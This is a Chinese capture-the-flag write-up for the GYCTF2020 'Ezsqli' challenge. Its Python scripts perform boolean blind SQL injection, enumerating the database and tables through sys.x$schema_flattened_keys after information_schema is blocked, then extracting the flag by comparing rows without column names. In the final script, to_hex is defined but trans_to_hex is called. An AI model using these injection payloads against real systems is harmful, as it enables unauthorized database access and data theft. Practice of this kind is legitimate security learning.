[GYCTF2020]Ezsqli

ezsqli

爆库

give_grandpa_pa_pa_pa

import requests
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid)
		data['id'] = "1+(ascii(substr(database(),%d,1))>%d)" % (i , mid)
		#print(data)
		r = requests.post(url,data=data)
		r.encoding = "utf-8"
		#print(url+payload)
		#print(r.text)
		if "V&N" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

爆表

information_schema被禁用了

然后看了大佬的wp发现还有个可用 sys.x$schema_flattened_keys可以用来爆

select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database()

发现两张表:

f1ag_1s_h3r3_hhhhh,users233333333333333

import requests
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid)
		data['id'] = "1+(ascii(substr((select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database())),%d,1))>%d)" % (i , mid)
		#print(data)
		r = requests.post(url,data=data)
		r.encoding = "utf-8"
		#print(url+payload)
		#print(r.text)
		if "V&N" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

直接爆字段

无列明爆字段,学到了，但是还是很疑惑这个列数怎么得到的

抄了大师傅的链接: http://www.gem-love.com/ctf/1782.html

学到新姿势，用字符串比较来爆破。

# -*- coding: utf-8 -*-
import requests
def to_hex(str):
    result = '0x'
    for i in str:
        temp = hex(ord(i))
        result += temp.replace('0x','')
    return result
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
cont = 100

while( cont>0 ):
	for i in range(32,126):
		now_str = trans_to_hex( result+chr(i) )
		data['id'] = "1+((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh limit 2,1))".format(now_str)
		#print(data)
		r = requests.post(url,data=data)
		r.encoding = "utf-8"
		#print(r.text)
		if "V&N" in r.text :
			result+=chr(i-1)
			print(result)
			cont = cont - 1
			break